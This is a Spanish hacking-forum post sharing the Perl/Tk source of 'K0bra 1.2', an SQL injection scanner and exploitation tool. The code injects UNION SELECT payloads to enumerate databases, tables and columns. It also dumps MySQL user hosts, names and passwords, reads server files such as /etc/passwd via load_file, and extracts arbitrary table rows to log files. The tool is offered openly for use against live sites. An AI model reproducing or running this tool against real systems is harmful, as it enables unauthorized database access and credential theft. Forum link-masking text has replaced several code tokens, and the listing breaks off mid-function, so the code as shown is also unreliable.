comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl Tk] K0bra 1.2

  • 0 Respuestas
  • 971 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Agosto 19, 2011, 11:28:44 pm »
Esta es la nueva version de mi scanner SQLi en el cual le mejore el diseño y arregle algunas fallas en el script

Una imagen seria




Código: Perl
  1. #!usr/bin/perl
  2. #K0bra 1.2 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::ROText;
  6. use Tk::PNG;
  7. use LWP::UserAgent;
  8. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  9.  
  10. my $bypass = "--";
  11. my $save = "";
  12.  
  13. installer();
  14.  
  15. if ($^O eq 'MSWin32') {
  16. use Win32::Console;
  17. Win32::Console::Free();
  18. }
  19.  
  20. my $nave = LWP::UserAgent->new();
  21. $nave->timeout(5);
  22. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  23.  
  24. my $logo = MainWindow->new(-background=>"black",-foreground=>"green");
  25. $logo->title("K0bra 1.2 (C) Doddy Hackman 2011");
  26. $logo->geometry("500x800+20+20");
  27. $logo->resizable(0,0);
  28.  
  29. my $tomaboludo = $logo->Photo(-file => "mirar.png");
  30. $logo->Label(-background=>"black",-image =>$tomaboludo,-borderwidth=>0)->place(-You are not allowed to view links. Register or Login=>20,-x=>40);  
  31.  
  32. #
  33. $logo->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>25,-You are not allowed to view links. Register or Login=>260);
  34. my $targetero = $logo->Entry(-width=>50,-text=>"http://127.0.0.1/sql.php?id=1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>263,-x=>90);
  35. $logo->Button(-text=>"Scan",-width=>10,-command=>\&start,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>260,-x=>400);
  36. #
  37.  
  38. $logo->Label(-text=>"Options",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>210,-You are not allowed to view links. Register or Login=>320);
  39.  
  40. $logo->Button(-text=>"Get DBS",-width=>10,-command=>\&getdbs,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>40);
  41. $logo->Button(-text=>"Get Tables",-width=>10,-command=>\&schematablesdb,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>120);
  42. $logo->Button(-text=>"Get Columns",-width=>10,-command=>\&schemacolumnsdb,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>200);
  43. $logo->Button(-text=>"mysql users",-width=>15,-command=>\&mynow,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>280);
  44. $logo->Button(-text=>"load_file",-width=>10,-command=>\&myfile,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>363,-x=>390);
  45.  
  46. $logo->Button(-text=>"Dump",-width=>10,-command=>\&dum,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>90);
  47. $logo->Button(-text=>"Hex",-width=>10,-command=>\&per1,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>170);
  48. $logo->Button(-text=>"ASCII",-width=>15,-command=>\&per2,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>250);
  49. $logo->Button(-text=>"Show Logs",-width=>10,-command=>\&china,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>400,-x=>360);
  50.  
  51. #
  52.  
  53. $logo->Label(-text=>"Details : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>500,-x=>90);
  54.  
  55. my $informatero = $logo->Listbox(-height=>5,-width=>40,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>480,-x=>160);
  56.  
  57. #
  58.  
  59. $logo->Label(-text=>"Databases",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>60);
  60. $logo->Label(-text=>"Tables",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>190);
  61. $logo->Label(-text=>"Columns",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>590,-x=>330);
  62.  
  63. my $datero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>40);
  64. my $tablero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>180);
  65. my $columnero = $logo->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>630,-x=>320);
  66.  
  67. #
  68.  
  69.  
  70. MainLoop;
  71.  
  72. sub start {
  73. msg("K0bra 1.2","Scan Started");
  74. $informatero->You are not allowed to view links. Register or Login("0.0","end");
  75. $datero->You are not allowed to view links. Register or Login("0.0","end");
  76. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  77. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  78.  
  79. my $tengo = $targetero->get;
  80.  
  81. my ($gen,$save,$control) = &You are not allowed to view links. Register or Login($tengo,"--");
  82. if ($control eq 1) {
  83. $logo->update;
  84. $targetero->configure(-text=>$gen);
  85. details($gen,$bypass,$save);
  86. } else {
  87. msg("K0bra 1.2","Not found length columns");
  88. }
  89. msg("K0bra 1.2","Scan Finished");
  90. }
  91.  
  92. sub You are not allowed to view links. Register or Login {
  93. my $rows  = "0";
  94. my $asc;
  95. my $page = $_[0];
  96. ($pass1,$pass2) = &bypass($_[1]);
  97. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
  98. $code = toma($inyection);
  99. $logo->update;
  100.  
  101. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  102.  
  103. $logo->update;
  104.  
  105. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  106. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  107.  
  108. unless ($testar1 eq $testar2) {
  109. my $patha = $1;
  110. $logo->update;
  111. You are not allowed to view links. Register or Login $patha;
  112. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  113. $total = "1";
  114. for my $rows(2..200) {
  115. $logo->update;
  116. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  117. $total.= ",".$rows;
  118. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  119. $test = toma($injection);
  120. if ($test=~/RATSXPDOWN/) {
  121. @number = $test =~You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;
  122. $control = 1;
  123. my $save = comer($_[0]);
  124. savefile($save.".txt","\n[Target confirmed] : $page");
  125. savefile($save.".txt","[Bypass] : $_[1]\n");
  126. savefile($save.".txt","[Limit] : The site has $rows columns");
  127. savefile($save.".txt","[Data] : The number @number print data");
  128. $informatero->insert("end","[+] The site has $rows columns");
  129. $informatero->insert("end","[+] The number @number print data");
  130. if ($patha) {
  131. savefile($save.".txt","[Full Path Discloure] : $patha");
  132. }
  133. $total=~You are not allowed to view links. Register or Login/$number[0]/hackman/;
  134. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  135. You are not allowed to view links. Register or Login($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  136. }
  137. }
  138. }
  139. } else {
  140. msg("K0bra 1.2","Not vulnerable");
  141. next;
  142. }
  143. }
  144.  
  145. sub details {
  146. my ($page,$bypass,$save) = @_;
  147. ($pass1,$pass2) = &bypass($bypass);
  148. savefile($save.".txt","\n");
  149. if ($page=~/(.*)hackman(.*)/ig) {
  150. my  ($start,$end) = ($1,$2);
  151. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  152. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  153. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  154. $test1 = toma($inforschema);
  155. $test2 = toma($mysqluser);
  156. $informatero->insert("end","");
  157. if ($test2=~/ERTOR854/ig) {
  158. savefile($save.".txt","[mysql.user] : ON");
  159. $informatero->insert("end","[mysql.user] : ON");
  160. } else {
  161. $informatero->insert("end","[mysql.user] : OFF");
  162. savefile($save.".txt","[mysql.user] : OFF");
  163. }
  164. if ($test1=~/ERTOR854/ig) {
  165. $informatero->insert("end","[information_schema.tables] : ON");
  166. savefile($save.".txt","[information_schema.tables] : ON");
  167. } else {
  168. $informatero->insert("end","[information_schema.tables] : OFF");
  169. savefile($save.".txt","[information_schema.tables] : OFF");
  170. }
  171. if ($test3=~/ERTOR854/ig) {
  172. $informatero->insert("end","[load_file] : ON");
  173. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  174. }
  175. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  176. $injection = $start.$concat.$end.$pass2;
  177. $code = toma($injection);
  178. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  179. $informatero->insert("end","");
  180. $informatero->insert("end","[+] DB Version : $1");
  181. $informatero->insert("end","[+] DB Name : $2");
  182. $informatero->insert("end","[+] user_name : $3");
  183. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  184. } else {
  185. msg("K0bra 1.2","Not Found DB Info");
  186. }
  187. }
  188. }
  189.  
  190.  
  191. sub getdbs {
  192. $datero->You are not allowed to view links. Register or Login("0.0","end");
  193. my $page = $targetero->get;
  194. my $save = comer($page);
  195. my $page1 = $page;
  196. savefile($save.".txt","\n");
  197. ($pass1,$pass2) = &bypass($bypass);
  198. $page=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  199. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  200. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  201. my $limita = $1;
  202. $logo->update;
  203. savefile($save.".txt","[+] Databases Length : $limita\n");
  204. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  205. $real = "1";
  206. for my $limit(0..$limita) {
  207. $logo->update;
  208. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  209. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  210. my $control = $1;
  211. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
  212. $datero->insert("end",$control);
  213. savefile($save.".txt","[Database $real Found] : $control");
  214. $real++;
  215. }
  216. }
  217. }
  218. } else {
  219. msg("K0bra 1.2","information_schema not found");
  220. }
  221. }
  222.  
  223.  
  224. sub schematablesdb {
  225.  
  226. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  227.  
  228. my $page = $targetero->get;
  229.  
  230. my $save = comer($page);
  231.  
  232. $d = $datero->curselection();
  233.  
  234. for my $id (@$d) {
  235. my $db = $datero->get($id);
  236.  
  237. my $page1 = $page;
  238. savefile($save.".txt","\n");
  239. ($pass1,$pass2) = &bypass($bypass);
  240. savefile($save.".txt","[DB] : $db");
  241. $page =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  242. $page1=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  243. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  244. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  245. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  246. $logo->update;
  247. savefile($save.".txt","[+] Tables Length :  $1\n");
  248. my $limit = $1;
  249. $real = "1";
  250. for my $lim(0..$limit) {
  251. $logo->update;
  252. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  253. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  254. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  255. my $table = $1;
  256. You are not allowed to view links. Register or Login $table;
  257. savefile($save.".txt","[Table $real Found : $table ]");
  258. $tablero->insert("end",$db.".".$table);
  259. $real++;
  260. }}
  261. } else {
  262. msg("K0bra 1.2","information_schema not found");
  263. }}}
  264.  
  265. sub schemacolumnsdb {
  266.  
  267. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  268.  
  269. my $page = $targetero->get;
  270. my $save = comer($page);
  271.  
  272. $d = $tablero->curselection();
  273.  
  274. for my $id (@$d) {
  275. my $da = $tablero->get($id);
  276.  
  277. if ($da=~/(.*)\.(.*)/) {
  278. my ($db,$table) = ($1,$2);
  279.  
  280. my $page3 = $page;
  281. my $page4 = $page;
  282.  
  283. savefile($save.".txt","\n");
  284. ($pass1,$pass2) = &bypass($bypass);
  285. savefile($save.".txt","\n[DB] : $db");
  286. savefile($save.".txt","[Table] : $table");
  287. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  288. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  289. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  290. savefile($save.".txt","[Columns length : $1 ]\n");
  291. my $si = $1;
  292. You are not allowed to view links. Register or Login $si;
  293. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  294. $real = "1";
  295. for my $limit2(0..$si) {
  296. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  297. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  298. $columnero->insert("end",$1);
  299. savefile($save.".txt","[Column $real] : $1");
  300. $real++;
  301. }
  302. }
  303. } else {
  304. msg("K0bra 1.2","information_schema not found");
  305. }
  306. }
  307. }
  308. }
  309.  
  310. sub mynow {
  311.  
  312. my $p = $targetero->get;
  313.  
  314. $mi = MainWindow->new(-background=>"black",-foreground=>"green");
  315. $mi->title("Mysql Extractor");
  316. $mi->geometry("500x300+20+20");
  317. $mi->resizable(0,0);
  318.  
  319. $mi->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  320. my $guix = $mi->Entry(-width=>40,-text=>$p,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  321. $mi->Button(-width=>10,-text=>"Extract",-command=>\&tengorax,-background=>"black",-foreground=>"green",-activebackground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  322.  
  323. $mi->Label(-text=>"Host",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>60,-You are not allowed to view links. Register or Login=>90);
  324. $mi->Label(-text=>"User",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>200,-You are not allowed to view links. Register or Login=>90);
  325. $mi->Label(-text=>"Password",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>360,-You are not allowed to view links. Register or Login=>90);
  326.  
  327. my $hostero = $mi->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>40);
  328. my $usero = $mi->Listbox(-width=>23,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>180);
  329. my $pasero = $mi->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>340);
  330.  
  331.  
  332. sub tengorax {
  333.  
  334. my $page = $guix->get;
  335. my $save = comer($page);
  336.  
  337. my $cop = $page;
  338. my $cop1 = $page;
  339. savefile($save.".txt","\n");
  340.  
  341. ($pass1,$pass2) = &bypass($bypass);
  342. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  343. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  344. if ($code=~/RATSXPDOWN/ig){
  345. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  346. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  347. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  348. $mi->update;
  349. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  350. for my $limit(0..$1) {
  351. $mi->update;
  352. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  353. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  354. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  355. $mi->update;
  356. $hostero->insert("end",$1);
  357. $usero->insert("end",$2);
  358. $pasero->insert("end",$3);
  359. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  360. } else {
  361. last;
  362. }}}
  363. } else {
  364. msg("K0bra 1.2","mysql.user not found");
  365. }
  366. }
  367. }
  368.  
  369. sub myfile {
  370.  
  371. my $pag = $targetero->get;
  372.  
  373. $loa = MainWindow->new(-background=>"black",-foreground=>"green");
  374. $loa->title("load_file helper");
  375. $loa->geometry("380x410+20+20");
  376. $loa->resizable(0,0);
  377.  
  378. $loa->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  379. my $aa = $loa->Entry(-width=>40,-text=>$pag,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>80);
  380. $loa->Label(-text=>"File : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>60,-x=>23);
  381. my $tea = $loa->Entry(-width=>20,-text=>"C:/xampp/htdocs/aca.txt",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>63,-x=>63);
  382. $loa->Button(-text=>"Encode",-width=>8,-command=>\&eno,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>62,-x=>200);
  383. $loa->Button(-text=>"Show",-width=>8,-command=>\&ena,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>62,-x=>263);
  384.  
  385. $loa->Label(-text=>"Output",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>160,-You are not allowed to view links. Register or Login=>130);
  386. my $mo = $loa->ROText(-width=>45,-height=>15,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>170,-x=>25);
  387.  
  388. sub eno {
  389. my $t = $tea->get;
  390. if ($t=~/0x/) {
  391. $tea->configure(-text=>decode($t));
  392. } else {
  393. $tea->configure(-text=>encode($t));
  394. }
  395. }
  396.  
  397. sub ena {
  398.  
  399. $mo->You are not allowed to view links. Register or Login("0.0","end");
  400.  
  401. my $page = $aa->get;
  402. my $save = comer($page);
  403.  
  404. savefile($save.".txt","\n");
  405. ($pass1,$pass2) = &bypass($bypass);
  406. if ($page =~/(.*)hackman(.*)/g) {
  407. my $start = $1; my $end = $2;
  408. my $file = $tea->get;
  409. You are not allowed to view links. Register or Login $file;
  410. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".$file."),char(107,48,98,114,97))))";
  411. my $code = toma($start.$concat.$end.$pass2);
  412. You are not allowed to view links. Register or Login $code;
  413.  
  414. if ($code=~/k0bra(.*)k0bra/You are not allowed to view links. Register or Login) {
  415. my $word = $1;
  416. $mo->insert("end",$word);
  417. savefile($save.".txt","[File Found] : $file");
  418. savefile($save.".txt","\n[Source Start]\n");
  419. savefile($save.".txt","$word");
  420. savefile($save.".txt","\n[Source End]\n");
  421. } else {
  422. msg("K0bra 1.2","Error");
  423. }}}}
  424.  
  425. sub dum {
  426.  
  427. my $pa = $targetero->get;
  428.  
  429. $max = MainWindow->new(-background=>"black",-foreground=>"green");
  430. $max->title("Dump Values");
  431. $max->geometry("480x380+20+20");
  432. $max->resizable(0,0);
  433.  
  434. $max->Label(-text=>"Target : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>20);
  435. my $tata = $max->Entry(-width=>40,-text=>$pa,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>23,-x=>110);
  436.  
  437. $max->Label(-text=>"Table : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>50,-You are not allowed to view links. Register or Login=>60);
  438. my $tato = $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-x=>105,-You are not allowed to view links. Register or Login=>63);
  439.  
  440. $max->Label(-text=>"Column1 : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>90,-x=>50);
  441. my $tatu = $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-x=>130,-You are not allowed to view links. Register or Login=>93);
  442.  
  443. $max->Label(-text=>"Column2 : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>130,-x=>50);
  444. my $tita= $max->Entry(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>133,-x=>130);
  445.  
  446.  
  447. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  448.  
  449. $max->Label(-text=>"Column1",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>100,-You are not allowed to view links. Register or Login=>180);
  450. $max->Label(-text=>"Column2",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>300,-You are not allowed to view links. Register or Login=>180);
  451.  
  452. my $duta1 = $max->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>210,-x=>70);
  453. my $duta2 = $max->Listbox(-width=>23,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>210,-x=>260);
  454.  
  455.  
  456. sub tengor {
  457.  
  458. $duta1->You are not allowed to view links. Register or Login("0.0","end");
  459. $duta2->You are not allowed to view links. Register or Login("0.0","end");
  460.  
  461. my $page = $tata->get;
  462. my $tabla = $tato->get;
  463. my $col1 = $tatu->get;
  464. my $col2 = $tita->get;
  465.  
  466. my $save = comer($page);
  467.  
  468. savefile($save.".txt","\n");
  469.  
  470. ($pass1,$pass2) = &bypass($bypass);
  471. if ($page=~/(.*)hackman(.*)/){
  472. my $start = $1;
  473. my $end = $2;
  474. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  475. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  476. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  477. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  478. $tota = $1;
  479. savefile($save.".txt","[Table] : $tabla");
  480. savefile($save.".txt","[+] Length of the rows: $tota\n");
  481. savefile($save.".txt","[$col1] [$col2]\n");
  482. for my $limit(0..$tota) {
  483. You are not allowed to view links. Register or Login $limit;
  484. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  485. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  486. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  487. $duta1->insert("end",$1);
  488. $duta2->insert("end",$2);
  489. } else {
  490. last;
  491. }}
  492. } else {
  493. msg("K0bra 1.2","Error");
  494. }}}}
  495.  
  496. sub per1 {
  497.  
  498. my $he = MainWindow->new(-background=>"black",-foreground=>"green");
  499. $he->title("Hex Converter (C) Doddy Hackman 2011");
  500. $he->geometry("420x70+20+20");
  501. $he->resizable(0,0);
  502. $he->Label(-text=>"Text : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  503. my $cam = $he->Entry(-width=>30,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  504. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  505. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  506.  
  507. sub paso1 {
  508.  
  509. my $caca = $cam->get();
  510. You are not allowed to view links. Register or Login $caca;
  511.  
  512. $cam->configure(-text=>encode($caca));
  513.  
  514. }
  515.  
  516. sub paso2 {
  517.  
  518. my $caca = $cam->get();
  519. You are not allowed to view links. Register or Login $caca;
  520.  
  521. $cam->configure(-text=>decode($caca));
  522.  
  523. }
  524. }
  525.  
  526.  
  527. sub per2 {
  528.  
  529. my $hexae = MainWindow->new(-background=>"black",-foreground=>"green");
  530. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  531. $hexae->geometry("420x70+20+20");
  532. $hexae->resizable(0,0);
  533. $hexae->Label(-text=>"Text : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  534. my $cama = $hexae->Entry(-width=>30,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  535. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  536. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  537.  
  538.  
  539. sub paso3 {
  540.  
  541. my $caca = $cama->get();
  542. You are not allowed to view links. Register or Login $caca;
  543.  
  544. $cama->configure(-text=>ascii($caca));
  545.  
  546. }
  547.  
  548. sub paso4 {
  549.  
  550. my $caca = $cama->get();
  551. You are not allowed to view links. Register or Login $caca;
  552.  
  553. $cama->configure(-text=>ascii_de($caca));
  554.  
  555. }
  556.  
  557. }
  558.  
  559. sub china {
  560. my $de = $targetero->get;
  561. my $save = comer($de);
  562. my $file = $save.".txt";
  563. You are not allowed to view links. Register or Login("start logs/webs/$file");
  564. }
  565.  
  566. sub bypass {
  567. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  568. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  569. else {You are not allowed to view links. Register or Login ("+","--");}}
  570.  
  571. sub ascii {
